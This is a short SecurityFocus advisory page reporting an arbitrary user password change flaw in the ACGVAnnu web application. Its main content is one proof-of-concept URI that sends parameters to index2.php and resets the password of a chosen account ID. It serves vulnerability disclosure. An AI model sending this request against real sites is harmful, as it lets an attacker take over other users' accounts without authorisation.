Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

ACGVAnnu Arbitrary User Password Change Vulnerability

An attacker can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://www.example.com/index2.php?id=&nom=ajann2&prenom=ajann2&pass=0002455&rubrik=modif&fo_remp=oui&id=167&mail=a&url=http://a&titre=a&descript=+a+&categorie=G%E9n%E9ral&Submit=Gonder







 

Privacy Statement
Copyright 2009, SecurityFocus